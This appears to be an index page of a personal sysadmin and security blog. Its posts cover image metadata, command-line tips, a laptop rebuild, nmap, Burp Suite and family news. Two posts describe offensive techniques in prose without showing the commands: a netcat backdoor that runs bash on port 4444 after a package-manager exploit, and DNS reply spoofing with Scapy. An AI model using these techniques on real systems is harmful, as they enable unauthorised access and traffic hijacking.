In addition to the images themselves, digital pictures contain a wealth of metadata information from the type of camera, resolution, GPS coordinates, date, etc.

Below is output from the following tools: macOS preview, exif tools, and imagemagick. Some tools, mainly from the CLI, tend to return more information.

Details

macOS Preview

EXIF tools

jemurray@shell:~$ exif DSC02149.JPG
EXIF tags in 'DSC02149.JPG' ('Intel' byte order):
--------------------+----------------------------------------------------------
Tag                 |Value
--------------------+----------------------------------------------------------
Image Description   |
Manufacturer        |SONY
Model               |CYBERSHOT
Orientation         |Top-left
X-Resolution        |72
Y-Resolution        |72
Resolution Unit     |Inch
Date and Time       |2007:12:05 12:04:18
YCbCr Positioning   |Co-sited
Compression         |JPEG compression
Manufacturer        |SONY
Model               |CYBERSHOT
Orientation         |Top-left
X-Resolution        |72
Y-Resolution        |72
Resolution Unit     |Inch
Date and Time       |2007:12:05 12:04:18
Exposure Time       |1/400 sec.
F-Number            |f/2.8
Exposure Program    |Normal program
ISO Speed Ratings   |100
Exif Version        |Exif Version 2.1
Date and Time (Origi|2007:12:05 12:04:18
Date and Time (Digit|2007:12:05 12:04:18
Components Configura|Y Cb Cr -
Compressed Bits per | 2
Exposure Bias       |0.00 EV
Maximum Aperture Val|2.00 EV (f/2.0)
Metering Mode       |Spot
Light Source        |Unknown
Flash               |Flash did not fire
Focal Length        |15.8 mm
Maker Note          |54 bytes undefined data
FlashPixVersion     |FlashPix Version 1.0
Color Space         |sRGB
Pixel X Dimension   |1600
Pixel Y Dimension   |1200
File Source         |DSC
Scene Type          |Directly photographed
Interoperability Ind|R98
Interoperability Ver|0100
--------------------+----------------------------------------------------------
EXIF data contains a thumbnail (4257 bytes).

Imagemagick

jemurray@shell:~$ identify -verbose DSC02149.JPG
Image: DSC02149.JPG
  Format: JPEG (Joint Photographic Experts Group JFIF format)
  Mime type: image/jpeg
  Class: DirectClass
  Geometry: 1600x1200+0+0
  Resolution: 72x72
  Print size: 22.2222x16.6667
  Units: PixelsPerInch
  Colorspace: sRGB
  Type: TrueColor
  Base type: Undefined
  Endianess: Undefined
  Depth: 8-bit
  Channel depth:
    red: 8-bit
    green: 8-bit
    blue: 8-bit
  Channel statistics:
    Pixels: 1920000
    Red:
      min: 0  (0)
      max: 255 (1)
      mean: 117.89 (0.462316)
      standard deviation: 59.8836 (0.234838)
      kurtosis: -1.09441
      skewness: 0.279962
      entropy: 0.950011
    Green:
      min: 0  (0)
      max: 251 (0.984314)
      mean: 117.175 (0.459511)
      standard deviation: 61.3972 (0.240773)
      kurtosis: -1.13271
      skewness: 0.30788
      entropy: 0.946928
    Blue:
      min: 0  (0)
      max: 255 (1)
      mean: 117.032 (0.45895)
      standard deviation: 68.8315 (0.269928)
      kurtosis: -1.15877
      skewness: 0.39023
      entropy: 0.958954
  Image statistics:
    Overall:
      min: 0  (0)
      max: 255 (1)
      mean: 117.366 (0.460259)
      standard deviation: 63.3708 (0.248513)
      kurtosis: -1.10722
      skewness: 0.335183
      entropy: 0.951965
  Rendering intent: Perceptual
  Gamma: 0.454545
  Chromaticity:
    red primary: (0.64,0.33)
    green primary: (0.3,0.6)
    blue primary: (0.15,0.06)
    white point: (0.3127,0.329)
  Background color: white
  Border color: srgb(223,223,223)
  Matte color: grey74
  Transparent color: black
  Interlace: None
  Intensity: Undefined
  Compose: Over
  Page geometry: 1600x1200+0+0
  Dispose: Undefined
  Iterations: 0
  Compression: JPEG
  Quality: 94
  Orientation: TopLeft
  Properties:
    date:create: 2021-01-06T22:02:35+00:00
    date:modify: 2021-01-06T22:02:35+00:00
    exif:ColorSpace: 1
    exif:ComponentsConfiguration: 1, 2, 3, 0
    exif:CompressedBitsPerPixel: 2/1
    exif:DateTime: 2007:12:05 12:04:18
    exif:DateTimeDigitized: 2007:12:05 12:04:18
    exif:DateTimeOriginal: 2007:12:05 12:04:18
    exif:ExifOffset: 218
    exif:ExifVersion: 48, 50, 49, 48
    exif:ExposureBiasValue: 0/10
    exif:ExposureProgram: 2
    exif:ExposureTime: 10/4000
    exif:FileSource: 3
    exif:Flash: 0
    exif:FlashPixVersion: 48, 49, 48, 48
    exif:FNumber: 28/10
    exif:FocalLength: 158/10
    exif:ImageDescription:
    exif:InteroperabilityOffset: 642
    exif:LightSource: 0
    exif:Make: SONY
    exif:MakerNote: 83, 79, 78, 89, 32, 68, 83, 67, 32, 0, 0, 0, 1, 0, 0, 14, 7, 0, 28, 0, 0, 0, 102, 2, 0, 0, 80, 114, 105, 110, 116, 73, 77, 0, 48, 49, 48, 48, 0, 0, 2, 0, 2, 0, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0
    exif:MaxApertureValue: 20/10
    exif:MeteringMode: 3
    exif:Model: CYBERSHOT
    exif:Orientation: 1
    exif:PhotographicSensitivity: 100
    exif:PixelXDimension: 1600
    exif:PixelYDimension: 1200
    exif:ResolutionUnit: 2
    exif:SceneType: 1
    exif:thumbnail:Compression: 6
    exif:thumbnail:DateTime: 2007:12:05 12:04:18
    exif:thumbnail:InteroperabilityIndex: R98
    exif:thumbnail:InteroperabilityVersion: 48, 49, 48, 48
    exif:thumbnail:JPEGInterchangeFormat: 851
    exif:thumbnail:JPEGInterchangeFormatLength: 4257
    exif:thumbnail:Make: SONY
    exif:thumbnail:Model: CYBERSHOT
    exif:thumbnail:Orientation: 1
    exif:thumbnail:ResolutionUnit: 2
    exif:thumbnail:XResolution: 72/1
    exif:thumbnail:YResolution: 72/1
    exif:XResolution: 72/1
    exif:YCbCrPositioning: 2
    exif:YResolution: 72/1
    icc:copyright: Copyright 2003 Apple Computer Inc., all rights reserved.
    icc:description: Camera RGB Profile
    jpeg:colorspace: 2
    jpeg:sampling-factor: 2x1,1x1,1x1
    signature: 69746be0dd2ec1e5e8658391db4e9faa64168ac47249d92a7a877a0f7c5350d1
  Profiles:
    Profile-exif: 5115 bytes
    Profile-icc: 1352 bytes
  Artifacts:
    filename: DSC02149.JPG
    verbose: true
  Tainted: False
  Filesize: 897923B
  Number pixels: 1920000
  Pixels per second: 48MB
  User time: 0.040u
  Elapsed time: 0:01.040
  Version: ImageMagick 6.9.10-23 Q16 x86_64 20190101 https://imagemagick.org

Repeating the same command while looking for differences

Tue, 05 Jan 2021 12:49:35 -0600

Overview

The watch command, in conjunction with the -d (display differences) option and a carefully curated input set, will generate a “top like” interface for realtime display of data sets. In this example, I am processing DNS queries logged by Zeek.

Details

This command:

watch -d 'cat dns.log | ../../bin/zeek-cut -d query  | sort | uniq -c | sort -rn | head -50'

Outputs the following information, updated every 2 seconds, with changes highlighted in white:

Merging PDFs with GhostScript on macOS

Mon, 04 Jan 2021 06:48:59 -0600

Overview

This solution will combine 2 or more PDF’s into a single file. It operates from the command line with nothing more then GhostScript installed from brew on macOS (or your favorite package manager on Linux).

Details

Install Ghostscript with brew:

brew install gs

Combine the PDF’s with GhostScript:

gs -q -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOutputFile=merged.pdf kc3-2020-obj1.pdf kc3-2020-obj2.pdf

Converting markdown to PDFs with pandoc on macOS

Sun, 03 Jan 2021 06:31:33 -0600

Overview

Converting markdown to pdf’s on macOS Big Sur with pandoc installed from brew.

Details

Install pandoc with brew:

brew install pandoc

Install basictex with brew:

brew install --cask basictex

Symlink the pdflatex binary into /usr/local/bin:

jemurray@jasons-mbp posts % sudo ln -s /Library/Tex/Distributions/.DefaultTeX/Contents/Programs/x86_64/pdflatex /usr/local/bin

Example conversion with images:

cat kc3-2020-obj1.md kc3-2020-obj2.md 
  \ | sed 's/(\/images\//(/g' 
  \ | pandoc -f markdown 
  \ --resource-path=../../static/images/ 
  \ -t pdf 
  \ -o ~/kc3-2020-writeup.pdf

Installing Ansible on a fresh install of Big Sur

Sat, 02 Jan 2021 12:28:00 -0600

Overview

While attempting to install Ansible in a virtual environment on a clean install of Big Sur, I received the following error:

ERROR: Could not build wheels for cryptography which use PEP 517 and cannot be installed directly

The problem resolved itself after upgrading pip:

pip install --upgrade pip

After the upgrade:

(.venv) jemurray@jasons-mbp:~/Documents/src/ansible $ pip install ansible
Collecting ansible
  Using cached ansible-2.10.4.tar.gz (28.6 MB)

...

Successfully installed MarkupSafe-1.1.1 PyYAML-5.3.1 ansible-2.10.4 ansible-base-2.10.4 cffi-1.14.4 cryptography-3.3.1 jinja2-2.11.2 packaging-20.8 pycparser-2.20 pyparsing-2.4.7 six-1.15.0

Details

First attempt installing Ansible (failed):

Rebuilding the Laptop in 2021

Fri, 01 Jan 2021 11:17:50 -0600

Overview

My first new years resolution. Rebuild my daily driver laptop.

Rebuild Details

Before starting the rebuild:
- Validate iCloud drive sync is functioning properly. Log into the web interface to spot check a few files.
- Validate TimeMachine has recently run a backup.
- Unmount all external backup disks.
- Dump list of /Applications: ls -al /Applications
- Dump list of software installed with brew: brew list
- Make sure the software list is backed up or synced with iCloud before rebooting.
Shutdown and power off.
Press the power button.
Immediately press and hold: <command>+r.
Connect to the Internet by selecting the wireless network in the upper right corner.
Select Disk Utility
- Note: There is no turning back from the following steps, all existing data will be deleted.
- Delete all existing partitions (Macintosh HD and Macintosh HD - Data).
- Create a new single partition.
- Erase the new partition with an APFS file system.
- Exit Disk Utility
Select: Reinstall macOS (reinstall a new copy of macOS)
- Unfortunately, this method will not install the latest OS. You must install the same macOS version that came with the system originally first.
Post Installation:
- Create the local user account.
- Don’t enable iCloud at this point.
- Install all the latest patches.
Start the upgrade to the latest macOS version.
System Preferences
- Enable firewall, it is off by default.
- Swap <control> and <cap-locks>.
- Setup keyboard short cuts to switch desktops with <control> + ##
- Uncheck automatically rearrange space in Mission Control settings.
- Enable TimeMachine and display in menu bar
- Accounts: Enable Google Contacts
Enable iCloud
- Enable iCloud Drive and sync Documents folder.
- Note: iCloud drive may take hours for files to start showing up. Give it time.
- Enable KeyChain - it will prompt for passwords.
Change shell from zsh to bash (chsh -s /bin/bash)
Setup dotfiles:
- Symlink .ssh (ln -s ~/Documents/dotfiles/.ssh ./)
  - Fix permissions on private key: chmod 600 id_rsa
- Symlink .bash_profile (ln -s ~Documents/dotfiles/.bash_profile ./)
Software installation:
- Brew
  - hugo
  - sipcalc
  - autossh
  - pandoc
  - basictex (brew cask install basictex)
  - gs
  - grepcidr
  - wget
  - tor
  - torsocks
  - mosh
  - gpg
  - jq
  - python-yq
  - iperf3
  - telnet
  - coreutils
  - mtr
  - pv
  - exiftool
  - pstree
  - htop
- LastPass (macOS and plugins)
  - Allow LastPass to monitor input from keyboard
- iTerm2
  - Enable terminal logging (plain text)
  - Set unlimited scroll-back
  - Mouse follows focus: prefs -> pointer -> general
  - Don’t adjust window when changing font size: prefs -> general -> window -> font
- Chrome
  - Sign in and enable sync
- Teams
- Slack (from AppStore)
- Discord
- Notion
- OneNote
  - Open Notebook: Jason’s Notes
- Zoom
- vscode
  - Login with GitHub account
  - Enable Configuration Sync
  - Extensions:
    - Markdown All in One
    - Python
    - Spell Right
    - Paste Image extensions
    - Foam for VSCode
    - GitHub Pull Requests and Issues
    - GitLens - Git supercharged
    - Jupyter
    - Markdown Notes
    - markdownlink
    - ToDo+
- Ansible
  - python3 -m venv .venv && source .venv/bin/activate && pip install --upgrade pip && pip install ansible
Firefox
ProWriting Aid
BoxDrive (not BoxSync, have to reboot after install)
OmniGraffle
Microsoft Office Suite: https://portal.office.com/account/
Tor Browser
Wireshark
Duet
Etcher
Postman
imagemagick
Microsoft Remote Desktop
Burp Suite

Post Installation Notes:

python3 is installed by default on Big Sur, I will try this out before installing python3 with brew.
I will no longer pip install anything outside of a python virtual environment .venv

Happy New Year 2021

Thu, 31 Dec 2020 19:58:29 -0600

Happy new year from my family to yours. Stay safe and hug your partner, family, and friends!

May the next year bring a new sense of curiosity, empathy, and happiness to us all!

Detect open network ports with nmap

Wed, 30 Dec 2020 16:14:25 -0600

Overview

A fundamental best practice within network security is to limit the number of listening services exposed to the public Internet. By limiting the attack surface of servers, rogue actors can not exploit what can’t be seen.

In the early 2000’s it was common for a newly installed server to have telnet, sendmail, ntp, apache, etc running. An unpatched flaw in any of these applications, is an avenue for a remote attacker to gain access to potentially sensitive data. In recent years, system security posture has improved. The default installation for most modern operating systems either protects the system with host based firewalls or disables services altogether. It is still a good practice to validate proper protections are in place.

How to fix automatic indenting when pasting into vim

Tue, 29 Dec 2020 14:56:08 -0600

Overview

When pasting text into a vim editor session, we occasionally run into an issue where line spacing is incorrect due to the autoindent or smartindent feature. When either of these options are set, vim tries to properly indent the lines based on the file type. However, if the original source is already indented, smartindent doubles the indentation.

Details

When the following options are configured in vim (autoindent and smartindent):

Using configuration templates and auto-vpn to automatically deploy a full-mesh VPN with Meraki routers

Mon, 28 Dec 2020 15:37:32 -0600

Overview

By combining Auto-VPN and Configuration Templates, Meraki routers can automatically configure and deploy full mesh site-to-site VPN tunnels with minimal user interaction.

The network diagram below is the basis of this configuration guide and lab:

Details

Template Creation

The foundation of this lab relies on deploying configurations automatically through the use of configuration templates. Configuration templates are applied to all devices in the Meraki environment.

First create a new network template:

Using lsof to determine which processes are listening on TCP or UDP ports

Sun, 27 Dec 2020 19:14:24 -0600

TL;DR

Use lsof to find all processes listening on TCP or UPD ports:

sudo lsof -n | egrep 'TCP.*LISTEN|UDP'

Details

After a routine security audit using nmap, a production server is found to be running a rogue server listening on port 8000:

jemurray@mbp-2019:~ $ nmap shell.jasonmurray.org
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-27 19:23 CST
Nmap scan report for shell.jasonmurray.org (104.131.191.87)
Host is up (0.067s latency).
Other addresses for shell.jasonmurray.org (not scanned): 2604:a880:800:10::19d5:4001
Not shown: 991 closed ports
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
443/tcp  open     https
8000/tcp open     http-alt

Connecting to port 8000 confirms the host is leaking files:

Using Pandoc to convert Hugo markdown with inline images

Sat, 26 Dec 2020 16:05:29 -0600

Problem

I write a lot of documentation within the Hugo framework for publishing on my personal website (this site). On occasion, I prefer to export a page to a standalone file without the HTML headers and footers Hugo applies as the site is generated.

To convert Hugo markdown files I use pandoc. If the markdown files contain explicit image links like this ![](/images/2020-12-26-15-31-02.png) pandoc will not find the images:

jemurray@mbp-2019:~/Documents/kringle2020/writeups $ pandoc ../../www-personal/current/jasonmurray.org/content/posts/kc3-2020-obj9.md  -o obj9.docx -f markdown -t docx --resource-path=../../www-personal/current/jasonmurray.org/static
[WARNING] Could not fetch resource '/images/2020-12-26-15-31-02.png': PandocIOError "/images/2020-12-26-15-31-02.png" /images/2020-12-26-15-31-02.png: openBinaryFile: does not exist (No such file or directory)

Solution

To resolve the explicit image path issue, I preprocess the markdown files with the following sed search-and-replace which replaces the explicit path with a relative path:

Merry Christmas from the Murray's 2020

Fri, 25 Dec 2020 21:18:59 -0600

Santa's relationship with Jeff Bezos?

Thu, 24 Dec 2020 14:15:43 -0600

“Wait, I forgot something in the house! I’ll be right back.”, my mom would say as we sat in the car to leave for the late Christmas eve church service. I didn’t realize until I had children of my own, Santa sometimes drops off presents early. He would leave a note for the parents explaining how to properly place presents under the tree and thank us for the help. In the 17 years since our children were born, Santa only graced our presence once during an exceptionally busy time in the St. Louis area.

Wireshark can read and decode CAN Bus data

Wed, 23 Dec 2020 17:43:03 -0600

What is CAN Bus

The CAN Bus or Controller Area Network, is a message based protocol in vehicles to facilitate communication between electronic control units (ECU). An ECU can be any device in the vehicle such as the engine, steering, cruise control, power locks, infotainment system, or sensors.

Wireshark

Wireshark can decode CAN-BUS data:

Searching man pages

Tue, 22 Dec 2020 09:22:43 -0600

Search for commands, functions, or key words in man pages using the man -k or apropos command:

jemurray@shell:~$ man -k regex
re_comp (3)          - BSD regex functions
re_exec (3)          - BSD regex functions
regcomp (3)          - POSIX regex functions
regerror (3)         - POSIX regex functions
regex (3)            - POSIX regex functions
regex (7)            - POSIX.2 regular expressions
regexec (3)          - POSIX regex functions
regfree (3)          - POSIX regex functions

Intercepting and Editing HTTP Requests with Burp Suite

Mon, 21 Dec 2020 16:39:39 -0600

Overview

Burp Suite Community Edition is a tool for exploring http transactions between a client and the server. We can intercept, edit, decode, and examine all requests by proxying browser traffic through burp suite.

Examples

To keep it simple, explore Burp with the built in browser:

Viewing a webpage with Intercept turned off. In this mode the website flows freely through burp:

When intercept is on, each transaction is stopped for inspection:

Cyberchef, the swiss army knife of converting, analyzing, and decoding information

Sun, 20 Dec 2020 18:32:18 -0600

Overview

CyberChef is a simple, intuitive web app for analysing and decoding data without having to deal with complex tools or programming languages.

There are around 200 useful operations in CyberChef for anyone working on anything vaguely Internet-related, whether you just want to convert a timestamp to a different format, decompress gzipped data, create a SHA3 hash, or parse an X.509 certificate to find out who issued itCyberChef encourages both technical and non-technical people to explore data formats, encryption and compression.

Married for 22 years

Sat, 19 Dec 2020 15:55:54 -0600

Happy Anniversary to US!

Twenty-two years ago today, I married this gal:

FAQ

When were you married?

1998

How did you meet?

Blind date setup setup by a mutual friend.

Where was your first date?

We went to see Dusk to Dawn. Yes, this was an awkward first date movie.

Funny moment from your first date?

Jami thought I was a drug dealer because I carried a cell phone and pager. Remember this in the late 1990’s, cell phones and pagers were not common. I guess she liked bad boys.

How did you propose?

In her parents basement. One night while we were hanging out together, I lit a candle, knelt down and asked her to marry me.

Memorable early moment in your lives?

On Friday I graduated from college, Saturday we were married, Sunday - Friday we went on our honeymoon in Mexico, Sunday we moved to Chicago in the worst snow storm in 20 years, Monday I started working in Chicago and Jami start college at UIC. In a span of one week, we endured three of the life changing events: graduating, marriage, and moving.

Where was your first house / apartment?

A second floor apartment at 1812 Georgia Court in Schaumburg, IL. A few of our friends from Michigan, who moved at the same time we did, also lived here.

First big purchase as a married couple?

Weber gas grill. We still have it 22 years later.

Week in Review: Issue #3

Fri, 18 Dec 2020 15:01:46 -0600

Issue #3 of Jason’s Week in Review, a consolidated source of news I found interesting over the past week.

https://www.nytimes.com/interactive/2020/10/30/science/wear-mask-covid-particles-ul.html - The NewYork times created an interactive view detailing how masks helps to spread the transmission of the corona virus and other potential pathogens.
https://news.ycombinator.com/item?id=25415989&p=2 - Google experienced an outage across many of their services.
https://arstechnica.com/gadgets/2020/12/google-sees-major-services-outages-two-days-in-a-row/ - Google experienced another outage that bounced inbound email.
https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html - Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor.
https://www.reuters.com/article/us-usa-cyber-breach-idUSKBN28R2ZJ - Microsoft found malware related to the SolarWinds compromise. This adds to an already alarming number of organizations affected by this incident.
https://github.com/rocky-linux/rocky - Rocky Linux is a community enterprise Operating System designed to be 100% bug-for-bug compatible with Enterprise Linux, now that CentOS has shifted direction.
https://www.wired.com/story/bgp-routing-manrs-google-fix/ - Over the past few weeks a group of high profile Internet service providers have been working on concrete recommendations to improve information published in the IRRs, enabling RPKI, and enhancing collaboration with tier-1 providers.
https://www.washingtonpost.com/nation/2020/12/14/first-covid-vaccines-new-york/ - Sandra Lindsay’s is the first first American to receive the coronavirus vaccine outside a clinical trial.

Using the /proc file system to gather information about the current process

Thu, 17 Dec 2020 16:42:04 -0600

Overview

The /proc directory is a pseudo-file system. It doesn’t contain ‘real’ files but runtime system information (e.g. system memory, devices mounted, hardware configuration, etc). In order words, it contains information about the running server as reported by the kernel.

There is a vast amount of information in the /proc directory. Today I needed to find information about the current process without running any commands. By using the /proc/self/* files, this information is readily available.

Replying to DNS queries with Python Scapy

Wed, 16 Dec 2020 16:15:39 -0600

Overview

Scapy is a Python program that enables users to send, sniff, dissect, and forge network packets. In this example, I use Scapy to intercept a specific DNS query and reply with a spoofed answer.

Details

Start the Scapy script (scroll down to see the code):

(.venv) root@home-server:/home/jemurray/scapy# ./scapy-dns.py
.
Sent 1 packets.

Send a query to the system running the Scapy script. For this example, there is no need to have a working DNS resolver. The Scapy program is listening on the raw interface waiting for a DNS packet to arrive.

Remote bash shell using netcat

Tue, 15 Dec 2020 16:20:51 -0600

Overview

In a recent project, I was asked to compromise and install a backdoor shell by exploiting a flaw in the package management system. To keep it simple, I chose nc (netcat) as the conduit to make the connection and execute /bin/bash on the remote host.

Details

On the remote system, I deployed a nc listener waiting for a connection on TCP port 4444. When a connection is made, nc executes /bin/bash:

Excluding matches with a regex exception

Mon, 14 Dec 2020 13:34:18 -0600

Overview

I am embarrassed to admit this, but I have never used a regex exclusion [^...] before. Regular expressions have been a part of my career for as far back as I can remember. I actually thought I had a pretty solid understanding of all the options available. But, exclusions… I somehow missed them.

With this construct we can find everything EXCEPT <insert pattern match here>, by using the exception [^...] character class.

Extracting files from a MS Windows, Nullsoft Installer self-extracting archive on Linux

Sun, 13 Dec 2020 20:20:52 -0600

TL;DR

Extract files from a Nullsoft self-extracting archive using, 7z:

7z e myapp.exe

Details

Given a Nullsoft self-extracting archive file:

jemurray@shell:~$ file myapp.exe
myapp.exe: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive

Install the extraction software on Linux, in this example Debian:

sudo apt install p7zip-full

Extract files from the .exe:

jemurray@shell:~$ 7z e myapp.exe

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU Intel(R) Xeon(R) Gold 6248 CPU @ 2.50GHz (50657),ASM,AES-NI)

Scanning the drive for archives:
1 file, 49824644 bytes (48 MiB)

Extracting archive: myapp.exe
--
Path = myapp.exe
Type = Nsis
Physical Size = 49824644
Method = Deflate
Solid = -
Headers Size = 102546
Embedded Stub Size = 57856
SubType = NSIS-3 Unicode BadCmd=11

Everything is Ok

Files: 9
Size:       50033887
Compressed: 49824644

Extracted files:

Multiple search options in find

Sat, 12 Dec 2020 22:16:21 -0600

In CTF game I am playing, one of my tasks is to find a file with a specific name, size, and owner deep within a directory tree. find is the logical command, but what are the options?

Using the -a option, multiple search criteria are chained together with logical and:

jemurray@shell:~$ find . -type f -a -name '*foo*' -a -size +5G -a -size -20G -a -user jemurray -ls
   131244 14498696 -rw-r--r--   1 jemurray jemurray 14846652416 Dec 13 01:49 ./14G-foo.img

Week in Review: Issue #2

Fri, 11 Dec 2020 08:54:30 -0600

Issue #2 of Jason’s Week in Review, a consolidated source of news I found interesting over the past week.

https://github.com/oskarsve/ms-teams-rce - Zero-click, wormable, cross-platform remote code execution in Microsoft Teams. Opening a message from an attacker is all that is necessary to remotely execute code on the victims computer.
https://arstechnica.com/tech-policy/2020/12/spacex-gets-886-million-from-fcc-to-subsidize-starlink-in-35-states/ -SpaceX has been awarded $885.51 million by the Federal Communications Commission to provide Starlink broadband to 642,925 rural homes and businesses in 35 states.
https://lists.centos.org/pipermail/centos-announce/2020-December/048208.html - CentOS is making a significant shift from their current OS offering. Instead of producing a production clone of RedHat Linux, after 2021 CentOS Linux 8, will cease as a rebuild of RHEL 8. CentOS Stream continues after that date, serving as the upstream (development) branch of Red Hat Enterprise Linux. In laymen’s terms, CentOS will no longer be a stable RedHat clone.
https://arstechnica.com/information-technology/2020/12/default-password-in-radiology-devices-leaves-healthcare-networks-open-to-attack/ - Dozens of radiology products from GE Healthcare contain a critical vulnerability that threatens the networks of hospitals and other health providers that use the devices, officials from the US government and a private security firm said on Tuesday. The devices—used for CT scans, MRIs, X-Rays, mammograms, ultrasounds, and positron emission tomography—use a default password to receive regular maintenance. The passwords are available to anyone who knows where on the Internet to look.
https://blog.youtube/news-and-events/supporting-the-2020-us-election - Youtube will start blocking misinformation by removing any piece of content uploaded that misleads people by alleging widespread fraud or errors changed the outcome of the 2020 U.S.
https://arstechnica.com/science/2020/12/starship-rises-high-performs-a-flawless-flip-but-doesnt-quite-stick-the-landing/, https://www.spacex.com/vehicles/starship/, https://www.youtube.com/watch?v=ap-BkkrRg-o - On Wednesday, December 9, Starship serial number 8 (SN8) lifted off from our Cameron County launch pad and successfully ascended, transitioned propellant, and performed its landing flip maneuver with precise flap control to reach its landing point. SpaceX’s Starship spacecraft and Super Heavy rocket (collectively referred to as Starship) represent a fully reusable transportation system designed to carry both crew and cargo to Earth orbit, the Moon, Mars and beyond.
https://2020.kringlecon.com/❄🎁⛄🎄🎅❄, https://www.youtube.com/watch?v=8e0SZrbWFuU - KringleCon3, the 2020 SANS Holiday Hack Challenge, is officially open this week.

Fixing garbled terminal output with reset

Thu, 10 Dec 2020 16:55:22 -0600

Sometimes when binary data is displayed to a terminal session it will garble the shell prompt and turn this:

jemurray@mbp-2019:/usr/bin $

into this:

8g䭢����C0@���-��uL:/�Y�/��� $

For example, cating out /dev/random:

jemurray@mbp-2019:/usr/bin $ head /dev/random
�M��&n�0�/[x6��4��(i/��M۩�5����'�^��_��g�d�qC|\x�u��.��J�DNi��~ò?\玀�O�D��lC�O��+� C�����G��:�����2�rc���h�胚���1yo{`L�I�
                                                                                                                         3��$�γ��ʄ}��U�q�����'�\��X�h��t+��_��\z+���^e�.
                                                                                                                                                                         1>2]��4��ԅ&L^���K�n
�dY���� $�0��-~��(�
                   �o�͛������:
                             ���T���a�P��l(\h�fh   ��(��3�m��6mp�
                                                                  O�ｳ� �}��?K�;Zl�x����F������o�l|WD��NLtB�9�C�a!�(��Pi��gk;f���e��^A�+��h_M�Y�{�q�v[�;���g`W�M���oʷ��Z�w�
                                                                                                                                                                            9`�j����ǘ����R��U�J��{9����7G���
                     :
                      >����
�u>���o�0g�r{B"l�ZA�
}��t.�d��~u����lWk�-�T�Π$c���F>�����'����$F�\��@�!��־�^G��v}!"xba�Q�Y��    |6���!�cm'k?����or�|�
1�Bj�   ��w7��%��K#P���~��:y$�I�e�tӱ*���2��,(���9/C�7��`:�3V����"�Ȑ^��4`����~�kL/D]����-���H׺����Mk@w����T@K�bʴ,Cc����:��7HX���A�����k���Y�.�)TJli���hJk���O���TKkD �Wk�{L�D��q���=(�kY�h':����zm%��3|v6��=4���6����i��vð��Z������MW�
�>�*^p���-�ңHoS2/G���`�5+t-hd6tn@L�(�{��f"w��(�q�8������l�<��9\�^Ն�f6����;f��?
���w����kⴃ���ᜊ��b_*cu�IWF�D��PwG
a���#b�(�R��T����Q�s\�Ο7i�$}�-�al�����*�YTt�+����tL��:К�4]#��ً��~�%J*���,�!�}�Z�
                                      $�?����xß��c
                                                  �{K��jm
C�O�ֆ���ڡ�]�rU7޻Sm֕.�[���;���݁x1�}����Mn�� ��s}�B��4�p'w?�{�$e�<�_�U)�������-R:�RJcվ�ߏe��N�'�n�Vc�c⇱�w0j]�G˵� !rĉ�$�H��I�ᇠ��6;I�㽔�-��5a���'        ��_u4~1��u}rQ���09�J,������g� ���Jȝ����kP��ԩX���Ů1X��*D��Shw��D�����l;���=�G�����=a�F+*�E>L�!����l��Nt4�E5��t���T�h��s��
��_<<Glzp6��*�  ���A�hי.�R�A�ܨ��5BT��#�e��L4B��ї�mr|�@p�7�sO)��]D=0\�O�2I�+i�;�J-
��      M�cErAF����
                   �t�M����헧�4t�V�ǲ�����Ep{�=�']�B���`�0�C{�� }��v�h��>(0M�j�������uL0�u���JM�0��_co�@��
                                                                                                         >
                                                                                                          �-}��_8��L����
                                                                                                                        �!`��t0�
�Kb8g䭢����C0gUmk�7�]ѽ"�PB� !�                                                                                                  �&8��
z`      k�T����泟)a


8g䭢����C0@���-��uL:/�Y�/��� $
8g䭢����C0@���-��uL:/�Y�/��� $
8g䭢����C0@���-��uL:/�Y�/��� $
8g䭢����C0@���-��uL:/�Y�/��� $
8g䭢����C0@���-��uL:/�Y�/��� $
8g䭢����C0@���-��uL:/�Y�/��� $
8g䭢����C0@���-��uL:/�Y�/��� $
8g䭢����C0@���-��uL:/�Y�/��� $
8g䭢����C0@���-��uL:/�Y�/��� $
8g䭢����C0@���-��uL:/�Y�/��� $
8g䭢����C0@���-��uL:/�Y�/��� $
8g䭢����C0@���-��uL:/�Y�/��� $
8g䭢����C0@���-��uL:/�Y�/��� $

To resolve this problem, type reset and press <enter>. The screen will clear and the terminal prompt should be reset back to normal:

Limiting bandwidth on macOS with TripMode

Wed, 09 Dec 2020 15:04:33 -0600

It is not uncommon for my macOS laptop to kick off a large software update, backup event, or an iCloud synchronization at the most inopportune time, such as roaming while on the iPhone hot spot or during a virtual meeting when a broadband link is bandwidth limited. To help ease this congestion, I use TripMode.

TripMode shapes bandwidth by blocking specified applications from accessing the network.

To simplify configuration, the profile switching feature automatically blocks applications depending on the connected network.

CentOS is moving from a stable distribution to an upstream development release

Tue, 08 Dec 2020 14:58:24 -0600

Today, the CentOS project released the following news:

The future of the CentOS Project is CentOS Stream, and over the next year we’ll be shifting focus from CentOS Linux, the rebuild of Red Hat Enterprise Linux (RHEL), to CentOS Stream, which tracks just ahead of a current RHEL release. CentOS Linux 8, as a rebuild of RHEL 8, will end at the end of 2021. CentOS Stream ontinues after that date, serving as the upstream (development) branch of Red Hat Enterprise Linux.

Managing Ubuntu servers over a serial console

Mon, 07 Dec 2020 15:26:38 -0600

Overview

By configuring the physical serial port on a Linux server to listen for incoming connections, administrators can replace the traditional keyboard and monitor with a single serial cable. Now system administrators can manage physical servers with a serial cable attached to a laptop or a serial console server over a remote SSH session.

Over the years, serial consoles have lost favor to lights out management cards, such as iLo, iDrac, or ipmi. However, in organizations where serial management is still prevalent, such as data centers with large networking environments, serial consoles are a viable alternative to LoM and KVM.

Using a pencil eraser to clean electrical contacts

Sun, 06 Dec 2020 11:51:26 -0600

Special tools or cleaning chemicals are not needed to clean electrical contacts. Instead, use a standard pencil eraser to remove the oxidation and buildup:

Note: Sorry for the blurry photos…

Before picture from a dirty Roomba dust bin contact:

Using the pencil eraser, I was able to rub off the majority of the build up:

Most of the grime is removed:

Book: Educated

Sat, 05 Dec 2020 12:45:43 -0600

